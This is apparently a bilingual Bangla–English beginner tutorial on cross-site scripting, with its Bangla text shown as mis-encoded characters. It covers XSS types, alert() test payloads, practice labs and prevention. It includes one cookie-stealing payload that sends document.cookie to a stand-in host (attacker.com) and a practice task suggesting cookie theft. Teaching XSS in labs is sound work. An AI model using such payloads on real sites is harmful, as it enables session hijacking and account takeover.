✅ Web Hacking Level 3: XSS (Cross Site Scripting) – Bangla Guide

๐Ÿ“Œ Level Title: XSS (Cross Site Scripting)
๐Ÿ“˜ Category: Web Hacking
๐ŸŒ Language: Bangla + English
๐Ÿ“ฅ Practice Tools: DVWA, PortSwigger XSS Labs, OWASP Juice Shop
๐Ÿ” Goal: XSS เฆฆিเงŸে Web Page เฆเฆฐ เฆญিเฆคเฆฐে Malicious Code Inject เฆ•เฆฐা เฆถিเฆ–া


๐Ÿง  What is XSS? (English + Bangla)

English:
XSS (Cross Site Scripting) is a web vulnerability that allows an attacker to inject malicious scripts (usually JavaScript) into webpages viewed by other users.

Bangla:
XSS เฆฌা Cross Site Scripting เฆนเฆฒো เฆเฆฎเฆจ เฆเฆ•เฆŸি เฆฆুเฆฐ্เฆฌเฆฒเฆคা, เฆฏাเฆฐ เฆฎাเฆง্เฆฏเฆฎে เฆเฆ•เฆœเฆจ Attacker เฆ•োเฆจো Web Page-เฆ JavaScript เฆธ্เฆ•্เฆฐিเฆช্เฆŸ เฆ‡เฆจเฆœেเฆ•্เฆŸ เฆ•เฆฐเฆคে เฆชাเฆฐে। เฆ“เฆ‡ Page เฆฏเฆ–เฆจ เฆ…เฆจ্เฆฏ เฆ•েเฆ‰ เฆฆেเฆ–ে, เฆคเฆ–เฆจ เฆ เฆธ্เฆ•্เฆฐিเฆช্เฆŸ เฆคাเฆฐ Browser-เฆ Execute เฆนเงŸ। เฆเฆคে Cookie เฆšুเฆฐি, Fake Login เฆ‡เฆค্เฆฏাเฆฆি เฆ•เฆฐা เฆฏাเงŸ।


๐Ÿ”ฅ Types of XSS (เฆงเฆฐเฆจเฆธเฆฎূเฆน)

XSS Type Description เฆฌাংเฆฒা เฆฌ্เฆฏাเฆ–্เฆฏা
Stored XSS Script saved on server (e.g., in comments) เฆธ্เฆ•্เฆฐিเฆช্เฆŸ เฆธাเฆฐ্เฆญাเฆฐে เฆœเฆฎা เฆฅাเฆ•ে
Reflected XSS Script appears in URL and executes immediately เฆ‡เฆ‰เฆ†เฆฐเฆเฆฒ-เฆ เฆ‡เฆจเฆœেเฆ•্เฆŸ เฆนเงŸ, เฆ•্เฆฒিเฆ• เฆ•เฆฐเฆฒে เฆเฆ•্เฆธিเฆ•িเฆ‰เฆŸ เฆนเงŸ
DOM-Based XSS Runs on client-side using JavaScript เฆ•্เฆฒাเงŸেเฆจ্เฆŸ เฆฌ্เฆฐাเฆ‰เฆœাเฆฐে JavaScript เฆฆিเงŸে เฆฐাเฆจ เฆนเงŸ

๐Ÿงช XSS Attack Example (Click-to-Copy)

๐Ÿ”— Example URL:

http://victim.com/search.php?q=<script>alert('XSS')</script>

Click-to-Copy:

<script>alert('XSS')</script>

⛔ เฆเฆ‡ Script victim เฆเฆฐ Browser เฆ alert Pop-up เฆคৈเฆฐি เฆ•เฆฐเฆฌে।


๐Ÿงฐ Tools for Practicing XSS

  • ๐Ÿ” DVWA (Damn Vulnerable Web App)
  • ⚔️ bWAPP (Buggy Web App)
  • ๐Ÿงƒ OWASP Juice Shop
  • ๐Ÿž PortSwigger XSS Labs

๐Ÿ’ฃ Real-Life Example

Comment Box เฆ เฆจিเฆšেเฆฐ เฆ•োเฆก เฆฆিเฆฒে – Cookie เฆšুเฆฐি เฆ•เฆฐা เฆฏাเงŸ:

<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

⚠️ XSS เฆเฆฐ เฆฌিเฆชเฆฆ เฆ•ী?

  • ✅ Victim เฆเฆฐ Cookies เฆšুเฆฐি เฆนเฆคে เฆชাเฆฐে
  • ✅ Fake Login Page เฆฆেเฆ–াเฆจো เฆฏাเงŸ
  • ✅ Victim เฆเฆฐ Account Hack เฆ•เฆฐা เฆฏাเงŸ
  • ✅ Web App-เฆเฆฐ เฆชুเฆฐা Control เฆจেเฆ“เงŸা เฆฏাเงŸ

๐Ÿ›ก️ How to Prevent XSS?

Method Explanation
✅ Input Validation User Input Properly Check เฆ•เฆฐเฆคে เฆนเฆฌে
✅ Output Encoding Display เฆ•เฆฐাเฆฐ เฆ†เฆ—ে Encode เฆ•เฆฐเฆคে เฆนเฆฌে
✅ Content Security Policy (CSP) Script Execution เฆจিเงŸเฆจ্เฆค্เฆฐเฆฃে เฆ†เฆจা เฆฏাเงŸ
✅ Escape Characters <, >, ", ', & เฆเฆ—ুเฆฒো Escape เฆ•เฆฐเฆคে เฆนเฆฌে

๐Ÿง  Practice Task

  1. DVWA เฆคে Reflected XSS เฆฒেเฆญেเฆฒ Complete เฆ•เฆฐো
  2. <script>alert("Hello XSS")</script> เฆฆিเงŸে Input Test เฆ•เฆฐো
  3. Alert Pop-up เฆฆেเฆ–เฆฒে เฆฌুเฆเฆฌে Success เฆนเงŸেเฆ›ে
  4. Stored XSS เฆเฆฌং Cookie Stealing เฆ•เฆฐে เฆช্เฆฐ্เฆฏাเฆ•เฆŸিเฆธ เฆฌাเงœাเฆ“

๐Ÿ“Œ Next Level: CSRF Attack (Level 4)